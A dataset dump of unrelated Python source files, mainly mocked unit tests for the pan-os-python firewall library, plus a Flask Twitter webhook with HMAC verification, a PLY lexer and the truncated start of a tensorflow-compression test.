m_uid.return_value = "uid"
for x in range(3):
child = mock.Mock(**spec)
self.obj.children.append(child)
ret_val = self.obj.delete()
self.assertIsNone(ret_val)
m_panos.set_config_changed.assert_called_once_with()
m_panos.active().xapi.delete.assert_called_once_with(
PanDeviceXpath, retry_on_peer=self.obj.HA_SYNC,
)
self.obj.xpath.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with("delete")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_delete_with_ha_sync_and_parent(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
Uid = "uid"
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.parent = mock.Mock()
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
m_uid.return_value = Uid
for x in range(3):
child = mock.Mock(**spec)
self.obj.children.append(child)
ret_val = self.obj.delete()
self.assertIsNone(ret_val)
self.obj.parent.remove.assert_called_once_with(self.obj)
m_panos.set_config_changed.assert_called_once_with()
m_panos.active().xapi.delete.assert_called_once_with(
PanDeviceXpath, retry_on_peer=self.obj.HA_SYNC,
)
self.obj.xpath.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with("delete")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_delete_without_ha_sync(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
m_uid.return_value = "uid"
self.obj.HA_SYNC = False
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
for x in range(3):
child = mock.Mock()
# Skip update
# Skip refresh
# Skip refresh_variable
# Skip _refresh_children
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_default_args_none_suffix(self, m_uid):
Xpath = "/x/path"
lasttag = ""
expected = "foo"
spec = {
"find.return_value": expected,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.get.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
ret_val = self.obj._refresh_xml(False, True)
self.assertEqual(expected, ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_default_args_with_member_suffix(self, m_uid):
Xpath = "/x/path"
lasttag = "member"
expected = "foo"
spec = {
"find.return_value": expected,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.get.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
self.obj.SUFFIX = Base.MEMBER
ret_val = self.obj._refresh_xml(False, True)
self.assertEqual(expected, ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_default_args_with_entry_suffix(self, m_uid):
Xpath = "/x/path"
lasttag = "entry"
expected = "foo"
spec = {
"find.return_value": expected,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.get.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
self.obj.SUFFIX = Base.ENTRY
ret_val = self.obj._refresh_xml(False, True)
self.assertEqual(expected, ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_with_running_config(self, m_uid):
Xpath = "/x/path"
lasttag = ""
expected = "foo"
spec = {
"find.return_value": expected,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.show.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
self.obj.refresh = mock.Mock()
ret_val = self.obj._refresh_xml(True, True)
self.assertEqual(expected, ret_val)
m_panos.xapi.show.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_no_refresh_children(self, m_uid):
Xpath = "/x/path"
lasttag = ""
expected = "foo"
spec = {
"find.return_value": expected,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.get.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
self.obj.refresh = mock.Mock()
ret_val = self.obj._refresh_xml(False, False)
self.assertEqual(expected, ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_pannosuchnode_with_exceptions_on_raises_error(
self, m_uid
):
Xpath = "/x/path"
spec = {
"id": "myid",
"xapi.get.side_effect": Err.PanNoSuchNode,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
m_uid.return_value = "uid"
self.assertRaises(Err.PanObjectMissing, self.obj._refresh_xml, False, True)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_pannosuchnode_with_exceptions_off_returns_none(
self, m_uid
):
Xpath = "/x/path"
spec = {
"id": "myid",
"xapi.get.side_effect": Err.PanNoSuchNode,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
m_uid.return_value = "uid"
ret_val = self.obj._refresh_xml(False, False)
self.assertIsNone(ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_panxapierror_with_exceptions_on_raises_error(
self, m_uid
):
Xpath = "/x/path"
spec = {
"id": "myid",
"xapi.get.side_effect": pan.xapi.PanXapiError,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
m_uid.return_value = "uid"
self.assertRaises(Err.PanObjectMissing, self.obj._refresh_xml, False, True)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_api_action_raises_panxapierror_with_exceptions_off_returns_none(
self, m_uid
):
Xpath = "/x/path"
spec = {
"id": "myid",
"xapi.get.side_effect": pan.xapi.PanXapiError,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
m_uid.return_value = "uid"
ret_val = self.obj._refresh_xml(False, False)
self.assertIsNone(ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_find_fails_with_exceptions_on_raises_error(self, m_uid):
Xpath = "/x/path"
lasttag = ""
expected = "foo"
spec = {
"find.return_value": None,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.get.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
self.assertRaises(Err.PanObjectMissing, self.obj._refresh_xml, False, True)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test__refresh_xml_find_fails_with_exceptions_off_returns_none(self, m_uid):
"""Requires exceptions=False."""
Xpath = "/x/path"
lasttag = ""
expected = "foo"
spec = {
"find.return_value": None,
}
m_root = mock.Mock(**spec)
m_uid.return_value = "uid"
spec = {
"id": "myid",
"xapi.get.return_value": m_root,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=Xpath)
ret_val = self.obj._refresh_xml(False, False)
self.assertIsNone(ret_val)
m_panos.xapi.get.assert_called_once_with(Xpath, retry_on_peer=self.obj.HA_SYNC)
self.obj.xpath.assert_called_once_with()
m_root.find.assert_called_once_with("result/{0}".format(lasttag))
def test_nearest_pandevice(self):
expected = "return value"
self.obj._nearest_pandevice = mock.Mock(return_value=expected)
ret_val = self.obj.nearest_pandevice()
self.assertEqual(expected, ret_val)
self.obj._nearest_pandevice.assert_called_once_with()
def test__nearest_pandevice_with_parent(self):
expected = "ParentObject"
spec = {
"_nearest_pandevice.return_value": expected,
}
self.obj.parent = mock.Mock(**spec)
ret_val = self.obj._nearest_pandevice()
self.assertEqual(expected, ret_val)
self.obj.parent._nearest_pandevice.assert_called_once_with()
def test__nearest_pandevice_without_parent_raises_error(self):
self.assertRaises(Err.PanDeviceNotSet, self.obj._nearest_pandevice)
def test_panorama_with_parent(self):
expected = "PanoramaObject"
spec = {
"panorama.return_value": expected,
}
self.obj.parent = mock.Mock(**spec)
ret_val = self.obj.panorama()
self.assertEqual(expected, ret_val)
self.obj.parent.panorama.assert_called_once_with()
def test_panorama_without_parent_raises_error(self):
self.assertRaises(Err.PanDeviceNotSet, self.obj.panorama)
def test_devicegroup_with_parent(self):
expected = "DeviceGroup"
spec = {
"devicegroup.return_value": expected,
}
self.obj.parent = mock.Mock(**spec)
ret_val = self.obj.devicegroup()
self.assertEqual(expected, ret_val)
self.obj.parent.devicegroup.assert_called_once_with()
def test_devicegroup_without_parent(self):
ret_val = self.obj.devicegroup()
self.assertIsNone(ret_val)
# Skip find
# Skip findall
# Skip find_or_create
# Skip findall_or_create
# Skip find_index
# Skip applyall
# Skip refreshall
# Skip refreshall_from_xml
# Skip _parse_xml
class TestParamPath(unittest.TestCase):
def setUp(self):
self.elm = ET.Element("myroot")
def test_element_for_exclude_returns_none(self):
settings = {"baz": "jack"}
p = Base.ParamPath(
"baz",
path="foo/bar",
vartype=None,
condition=None,
values=None,
exclude=True,
)
result = p.element(self.elm, settings, False)
self.assertIsNone(result)
def test_element_path_has_variable(self):
p = Base.ParamPath(
"baz", path="{mode}/bar/baz", vartype=None, condition=None, values=None
)
settings = {"baz": "jack", "mode": "layer3"}
result = p.element(self.elm, settings, False)
self.assertIsNotNone(result)
elm = result.find("./layer3/bar/baz")
self.assertIsNotNone(elm, msg="Failed: elm = {0}".format(ET.tostring(result)))
self.assertEqual(settings["baz"], elm.text)
def test_element_for_vartype_member_for_string(self):
p = Base.ParamPath(
"baz", path="foo/bar/baz", vartype="member", condition=None, values=None
)
settings = {"baz": "jack"}
result = p.element(self.elm, settings, False)
self.assertIsNotNone(result)
elm = result.findall("./foo/bar/baz/member")
self.assertTrue(elm)
self.assertEqual(1, len(elm))
self.assertEqual(settings["baz"], elm[0].text)
def test_element_for_vartype_member_for_list(self):
p = Base.ParamPath(
"baz", path="foo/bar/baz", vartype="member", condition=None, values=None
)
settings = {"baz": ["jack", "john", "jane", "margret"]}
result = p.element(self.elm, settings, False)
self.assertIsNotNone(result)
elms = result.findall("./foo/bar/baz/member")
self.assertEqual(len(settings["baz"]), len(elms))
for elm in elms:
self.assertTrue(elm.text in settings["baz"])
class Abouter(object):
def __init__(self, mode="layer3"):
self.mode = mode
def _about_object(self):
return {"mode": self.mode}
class ParentClass1(Abouter):
pass
class ParentClass2(Abouter):
pass
class UnassociatedParent(Abouter):
pass
class TestParentAwareXpathBasics(unittest.TestCase):
DEFAULT_PATH_1 = "/default/path/1"
DEFAULT_PATH_2 = "/default/path/2"
SPECIFIED_PATH_1 = "/some/specific/path/1"
SPECIFIED_PATH_2 = "/some/specific/path/2"
def setUp(self):
self.obj = Base.ParentAwareXpath()
self.obj.add_profile(value=self.DEFAULT_PATH_1)
self.obj.add_profile("1.0.0", self.DEFAULT_PATH_2)
self.obj.add_profile(
value=self.SPECIFIED_PATH_1, parents=("ParentClass1", "ParentClass2")
)
self.obj.add_profile(
"2.0.0", self.SPECIFIED_PATH_2, ("ParentClass1", "ParentClass2")
)
def test_old_default_xpath(self):
parent = UnassociatedParent()
self.assertEqual(
self.DEFAULT_PATH_1, self.obj._get_versioned_value((0, 5, 0), parent)
)
def test_new_default_xpath(self):
parent = UnassociatedParent()
self.assertEqual(
self.DEFAULT_PATH_2, self.obj._get_versioned_value((1, 0, 0), parent)
)
def test_old_specefied_xpath_for_class1(self):
parent = ParentClass1()
self.assertEqual(
self.SPECIFIED_PATH_1, self.obj._get_versioned_value((0, 5, 0), parent)
)
def test_new_specefied_xpath_for_class1(self):
parent = ParentClass1()
self.assertEqual(
self.SPECIFIED_PATH_2, self.obj._get_versioned_value((2, 0, 0), parent)
)
def test_old_specefied_xpath_for_class2(self):
parent = ParentClass2()
self.assertEqual(
self.SPECIFIED_PATH_1, self.obj._get_versioned_value((0, 0, 0), parent)
)
def test_new_specefied_xpath_for_class2(self):
parent = ParentClass2()
self.assertEqual(
self.SPECIFIED_PATH_2, self.obj._get_versioned_value((5, 0, 0), parent)
)
def test_no_parent_gets_newest_version(self):
parent = None
self.assertEqual(
self.DEFAULT_PATH_2,
self.obj._get_versioned_value(
Base.VersionedPanObject._UNKNOWN_PANOS_VERSION, parent
),
)
def test_no_fallback_raises_value_error(self):
parent = None
obj = Base.ParentAwareXpath()
obj.add_profile(
parents=("ParentClass1",), value="/some/path",
)
self.assertRaises(ValueError, obj._get_versioned_value, (1, 0, 0), parent)
class TestParentAwareXpathWithParams(unittest.TestCase):
OLD_LAYER3_PATH = "/units/layer3/old"
NEW_LAYER3_PATH = "/units/layer3/new"
OLD_LAYER2_PATH = "/units/layer2/old"
NEW_LAYER2_PATH = "/units/layer2/new"
def setUp(self):
self.obj = Base.ParentAwareXpath()
self.obj.add_profile(parents=("ParentClass1", None), value=self.OLD_LAYER3_PATH)
self.obj.add_profile(
version="1.0.0", parents=("ParentClass1", None), value=self.NEW_LAYER3_PATH
)
self.obj.add_profile(
parents=("ParentClass1",),
parent_param="mode",
parent_param_values=["junk", "layer2"],
value=self.OLD_LAYER2_PATH,
)
self.obj.add_profile(
version="2.0.0",
parents=("ParentClass1",),
parent_param="mode",
parent_param_values=["junk", "layer2"],
value=self.NEW_LAYER2_PATH,
)
def test_old_default_path(self):
parent = UnassociatedParent("foo")
self.assertEqual(
self.OLD_LAYER3_PATH, self.obj._get_versioned_value((0, 5, 0), parent)
)
def test_known_parent_and_param_for_old_l3_path(self):
parent = ParentClass1()
self.assertEqual(
self.OLD_LAYER3_PATH, self.obj._get_versioned_value((0, 5, 0), parent)
)
def test_known_parent_and_param_for_new_l3_path(self):
parent = ParentClass1()
self.assertEqual(
self.NEW_LAYER3_PATH, self.obj._get_versioned_value((1, 5, 0), parent)
)
def test_known_parent_and_param_for_old_l2_path(self):
parent = ParentClass1("layer2")
self.assertEqual(
self.OLD_LAYER2_PATH, self.obj._get_versioned_value((0, 1, 0), parent)
)
def test_known_parent_and_param_for_new_l2_path(self):
parent = ParentClass1("layer2")
self.assertEqual(
self.NEW_LAYER2_PATH, self.obj._get_versioned_value((5, 1, 0), parent)
)
def test_no_parent_gets_newest_default(self):
parent = None
self.assertEqual(
self.NEW_LAYER3_PATH,
self.obj._get_versioned_value(
Base.VersionedPanObject._UNKNOWN_PANOS_VERSION, parent
),
)
class MyVersionedObject(Base.VersionedPanObject):
SUFFIX = Base.ENTRY
def _setup(self):
params = []
params.append(
Base.VersionedParamPath("entries", path="multiple/entries", vartype="entry")
)
params.append(
Base.VersionedParamPath(
"members", path="multiple/members", vartype="member"
)
)
params.append(Base.VersionedParamPath("someint", path="someint", vartype="int"))
self._params = tuple(params)
class TestEqual(unittest.TestCase):
def test_ordered(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
self.assertTrue(o1.equal(o2))
def test_unordered_entries(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["b", "a"], ["c", "d"], 5)
self.assertTrue(o1.equal(o2))
def test_unordered_members(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["a", "b"], ["d", "c"], 5)
self.assertTrue(o1.equal(o2))
def test_values_are_unchanged_after_comparison(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["b", "a"], ["d", "c"], 5)
o1.equal(o2)
self.assertEqual(o1.entries, ["a", "b"])
self.assertEqual(o1.members, ["c", "d"])
self.assertEqual(o2.entries, ["b", "a"])
self.assertEqual(o2.members, ["d", "c"])
def test_str_list_field_is_equal(self):
o1 = MyVersionedObject("a", ["a",], ["c", "d"], 5)
o2 = MyVersionedObject("a", "a", ["c", "d"], 5)
self.assertTrue(o1.equal(o2))
def test_unequal_entries_returns_false(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["a", "i"], ["c", "d"], 5)
self.assertFalse(o1.equal(o2))
def test_unequal_members_returns_false(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["a", "b"], ["c", "i"], 5)
self.assertFalse(o1.equal(o2))
def test_unequal_ints_returns_false(self):
o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
o2 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 6)
self.assertFalse(o1.equal(o2))
class TestTree(unittest.TestCase):
def test_dot(self):
import panos.device as Device
expected = (
"digraph configtree {graph [rankdir=LR, fontsize=10, margin=0.001];"
"node [shape=box, fontsize=10, height=0.001, margin=0.1, ordering=out];"
'"PanDevice : None" [style=filled fillcolor= '
'URL="http://pan-os-python.readthedocs.io/en/latest/module-base.html#panos.base.PanDevice" '
'target="_blank"];"SystemSettings : " [style=filled fillcolor=lightpink '
'URL="http://pan-os-python.readthedocs.io/en/latest/module-device.html'
'#panos.device.SystemSettings" target="_blank"];'
'"PanDevice : None" -> "SystemSettings : ";}'
)
fw = Base.PanDevice(hostname=None, serial="Serial")
sys = Device.SystemSettings()
fw.add(sys)
ret_val = fw.dot()
self.assertEqual(ret_val, expected)
class TestPanDevice(unittest.TestCase):
def setUp(self):
self.obj = Base.PanDevice("localhost", "admin", "admin", "secret")
self.obj._version_info = (99, 0, 0)
def test_plugins_empty_release_note(self):
resp = [
'<response status="success"><result><plugins>',
"<entry>",
"<name>vm_series</name>",
"<version>1.0.11</version>",
"<release-date>Built-in</release-date>",
"<release-note-url><![CDATA[]]></release-note-url>",
"<pkg-file>vm_series-1.0.11</pkg-file>",
"<size>15M</size>",
"<platform>any</platform>",
"<installed>yes</installed>",
"<downloaded>yes</downloaded>",
"</entry>",
"</plugins></result></response>",
]
spec = {
"return_value": ET.fromstring("".join(resp)),
}
self.obj.op = mock.Mock(**spec)
ans = self.obj.plugins()
self.assertTrue(ans is not None)
self.assertTrue(isinstance(ans, list))
self.assertTrue(len(ans) == 1)
ad = ans[0]
self.assertTrue(isinstance(ad, dict))
self.assertEqual(ad.get("name"), "vm_series")
self.assertEqual(ad.get("version"), "1.0.11")
self.assertEqual(ad.get("release_date"), "Built-in")
self.assertEqual(ad.get("release_note_url"), "")
self.assertEqual(ad.get("package_file"), "vm_series-1.0.11")
self.assertEqual(ad.get("size"), "15M")
self.assertEqual(ad.get("platform"), "any")
self.assertEqual(ad.get("installed"), "yes")
self.assertEqual(ad.get("downloaded"), "yes")
class TestWhoami(unittest.TestCase):
def test_self_is_present(self):
expected = "user2"
resp = [
"<response>",
"<result>",
"<admins>",
"<entry><admin>user1</admin><type>Web</type></entry>",
"<entry><admin>{0}</admin><type>Web</type><self/></entry>".format(expected),
"</admins>",
"</result>",
"</response>",
]
spec = {
"return_value": ET.fromstring("".join(resp)),
}
con = Base.PanDevice("127.0.0.1", "a", "b", "c")
con.op = mock.Mock(**spec)
self.assertEqual(expected, con.whoami())
def test_not_present(self):
resp = [
"<response>",
"<result>",
"<admins>",
"<entry><admin>user1</admin><type>Web</type></entry>",
"<entry><admin>user2</admin><type>Web</type></entry>",
"<entry><admin>user3</admin><type>Web</type></entry>",
"</admins>",
"</result>",
"</response>",
]
spec = {
"return_value": ET.fromstring("".join(resp)),
}
con = Base.PanDevice("127.0.0.1", "a", "b", "c")
con.op = mock.Mock(**spec)
self.assertIsNone(con.whoami())
class TestDeleteSimilar(unittest.TestCase):
def config(self, length=10, count=1, suffix="entry"):
dev = mock.Mock()
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
listing = []
for x in range(count):
obj = Base.PanObject("".join(random.choice(chars) for y in range(length)),)
obj.parent = mock.Mock()
listing.append(obj)
# Now tweak the first element for the tests, the rest don't matter.
obj = listing[0]
obj._gather_bulk_info = mock.Mock(return_value=(dev, listing, None),)
if suffix == "member":
obj.SUFFIX = Base.MEMBER
else:
obj.SUFFIX = Base.ENTRY
obj._perform_vsys_dict_import_delete = mock.Mock()
obj.xpath_nosuffix = mock.Mock(return_value="/mock/xpath")
return dev, listing, obj
def test_delete_one_entry(self):
dev, listing, obj = self.config()
obj.delete_similar()
dev.xapi.delete.assert_called_once()
dev.xapi.delete.assert_called_once_with(
"/mock/xpath/entry[@name='{0}']".format(obj.uid), retry_on_peer=obj.HA_SYNC,
)
def test_delete_one_member(self):
dev, listing, obj = self.config(suffix="member")
obj.delete_similar()
dev.xapi.delete.assert_called_once()
dev.xapi.delete.assert_called_once_with(
"/mock/xpath/member[text()='{0}']".format(obj.uid),
retry_on_peer=obj.HA_SYNC,
)
def test_delete_two_entries(self):
dev, listing, obj = self.config(count=2)
obj.delete_similar()
dev.xapi.delete.assert_called_once()
dev.xapi.delete.assert_called_once_with(
"/mock/xpath/entry[@name='{0}' or @name='{1}']".format(
listing[0].uid, listing[1].uid
),
retry_on_peer=obj.HA_SYNC,
)
def test_delete_two_members(self):
dev, listing, obj = self.config(count=2, suffix="member")
obj.delete_similar()
dev.xapi.delete.assert_called_once()
dev.xapi.delete.assert_called_once_with(
"/mock/xpath/member[text()='{0}' or text()='{1}']".format(
listing[0].uid, listing[1].uid
),
retry_on_peer=obj.HA_SYNC,
)
def test_delete_gets_chunked_for_entries(self):
dev, listing, obj = self.config(length=30, count=1000, suffix="entry")
obj.delete_similar()
self.assertEqual(2, dev.xapi.delete.call_count)
def test_delete_gets_chunked_for_members(self):
dev, listing, obj = self.config(length=30, count=1000, suffix="member")
obj.delete_similar()
self.assertEqual(2, dev.xapi.delete.call_count)
def test_delete_extreme_entries(self):
dev, listing, obj = self.config(length=30, count=10000, suffix="entry")
obj.delete_similar()
self.assertTrue(dev.xapi.delete.call_count > 2)
def test_delete_extreme_members(self):
dev, listing, obj = self.config(length=30, count=10000, suffix="member")
obj.delete_similar()
self.assertTrue(dev.xapi.delete.call_count > 2)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
4818402 | from .viewport_helpers import compute_view # noqa
from .type_checking import is_pandas_df # noqa
from .color_scales import assign_random_colors # noqa
| StarcoderdataPython |
1935182 | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import hashlib
import hmac
import json
import logging
import redis
import sys
from datetime import datetime
from flask import Flask, abort, request
from config import TWITTER_CONSUMER_SECRET
from utils import Queue
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s %(levelname)s - %(message)s",
)
app = Flask(__name__)
queue = Queue()
@app.after_request
def track_request(response):
logging.debug("Payload\n" + json.dumps({
"time" : str(datetime.now()),
"request": {
"endpoint" : request.endpoint,
"method" : request.method,
"path" : request.path,
"headers" : dict(request.headers),
"args" : dict(request.args),
"form" : request.form,
"data" : str(request.data, 'ascii'),
"remote_addr": request.remote_addr,
},
"response": {
"status_code": response.status_code,
"headers" : dict(response.headers),
"data" : str(response.data, 'ascii'),
},
}, indent=4))
return response
# Challenge-Response Checks
@app.route("/webhook", methods=['GET'])
def webhook_crc():
if 'crc_token' not in request.args:
abort(400)
token = request.args['crc_token']
digest = hmac.new(
key=TWITTER_CONSUMER_SECRET.encode(),
msg=token.encode(),
digestmod=hashlib.sha256,
).digest()
response_token = base64.b64encode(digest).decode()
logging.info(f"CRC: token={token}, response_token={response_token}")
return json.dumps({
'response_token': "sha256=" + response_token,
})
# Events Webhook
@app.route("/webhook", methods=['POST'])
def webhook_event():
# Validate Request from Twitter
signature_user = request.headers.get('x-twitter-webhooks-signature', "")
if signature_user.startswith("sha256="):
signature_user = signature_user[7:]
digest = hmac.new(
key=TWITTER_CONSUMER_SECRET.encode(),
msg=request.data,
digestmod=hashlib.sha256,
).digest()
signature_server = base64.b64encode(digest).decode()
if not hmac.compare_digest(signature_user, signature_server):
logging.warn(f"Webhook signature invalid: signature_user={signature_user}, signature_server={signature_server}")
return abort(400)
# Add Event Message to Redis Queue
if request.json:
queue.add(request.json)
else:
logging.warn(f"Non-JSON message: {request.data}")
return "OK"
if __name__ == '__main__':
app.run()
| StarcoderdataPython |
3281612 | <gh_stars>10-100
from ..config import *
from ply.lex import lex as plex
# lex
tokens = (
'bofx',
'eofx',
'newline',
'tab',
'interpolant',
'lce',
'rce',
'string',
)
def t_newline(t):
r'\n'
return t
def t_tab(t):
r'\t'
return t
def t_interpolant(t):
r'\{(?P<fmt>[^\{:]*):(?P<arg>[^\}]+)\}'
t.value = Interpolant(t)
return t
def t_lce(t):
r'\{\{'
t.value = "'{'"
return t
def t_rce(t):
r'\}\}'
t.value = "'}'"
return t
def t_string(t):
r'[^\{\}\t\n]+'
t.value = repr(t.value)
return t
def t_error(t):
t.lexer.module.throw(
err.string_format_error,
line = t.lexer.lineno,
position = t.lexer.lexpos,
token = repr(t.value),
)
main_lexer = plex()
class Lexer(Data):
def __init__(s, module):
s.module = module
s.lexer = main_lexer.clone()
s.lexer.module = module
s.fmt = []
s.args = []
s.star_used = 0
def star(s):
if s.star_used:
return ''
else:
s.star_used = 1
return '*'
def input(s, source):
s.lexer.input(source)
s.tokens = [Bofx()]
t = s.lexer.token()
while t:
s.tokens.append(t)
t = s.lexer.token()
s.tokens.append(Eofx())
if s.module.verbose.fml:
s.module.verbose_tag('fml: lex')
for t in s.tokens:
print(t.type, repr(t.value))
def token(s):
if s.tokens:
return s.tokens.pop(0)
def __add__(s, other):
s.fmt.append('\"' + other + ',\"')
return s
def __truediv__(s, other):
s.fmt.append('\"' + other + '\"')
return s
def __mul__(s, other):
s.fmt.append(other)
return s
def __sub__(s, other):
s.args.append(other)
return s
class Bofx:
type = 'bofx'
value = ''
def __repr__(s):
return 'Bofx()'
class Eofx:
type = 'eofx'
value = ''
def __repr__(s):
return 'Eofx()'
class Interpolant(Data):
def __init__(s, t):
m = t.lexer.lexmatch
s.fmt = m.group('fmt')
s.arg = m.group('arg')
s.value = t.value
def __repr__(s):
return "'{:s}' '{:s}'".format(s.fmt, s.arg) | StarcoderdataPython |
6465510 | <filename>tensorflow_compression/python/ops/math_ops_test.py
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the math operations."""
import scipy.stats
import tensorflow as tf
from tensorflow.python.framework import test_util
from tensorflow_compression.python.ops import math_ops
from tensorflow_compression.python.ops import soft_round_ops
@test_util.deprecated_graph_mode_only
class MathTest(tf.test.TestCase):
def _test_upper_bound(self, gradient):
inputs = tf.compat.v1.placeholder(dtype=tf.float32)
outputs = math_ops.upper_bound(inputs, 0, gradient=gradient)
pgrads, = tf.gradients([outputs], [inputs], [tf.ones_like(inputs)])
ngrads, = tf.gradients([outputs], [inputs], [-tf.ones_like(inputs)])
inputs_feed = [-1, 1]
outputs_expected = [-1, 0]
if gradient == "disconnected":
pgrads_expected = [1, 0]
